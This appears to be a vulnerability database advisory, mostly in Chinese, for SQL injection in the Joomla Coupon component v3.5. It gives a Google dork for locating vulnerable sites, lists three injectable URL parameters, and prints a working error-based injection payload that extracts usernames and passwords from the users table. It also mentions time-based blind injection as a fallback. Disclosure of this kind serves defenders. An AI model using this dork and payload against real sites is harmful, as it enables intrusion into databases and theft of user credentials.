Joomla! Component Coupon v3.5 - SQL Injection

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Joomla! Component Coupon v3.5 - SQL Injection Joomla! Component Coupon v3.5,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间的盲注 Google Dork: inurl:index.php?option=com_coupon 注入点: # http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&task=mail_box&=[SQL] # http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=[SQL] # http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&storeid=[SQL] 报错注入 payload: http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=7+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,char(58),password)+AS+CHAR),0x7e))+FROM+wl6xp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) 测试截图: ![](https://images.seebug.org/contribute/b6ed8b16-cede-431c-9c7a-38838f3658b2)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息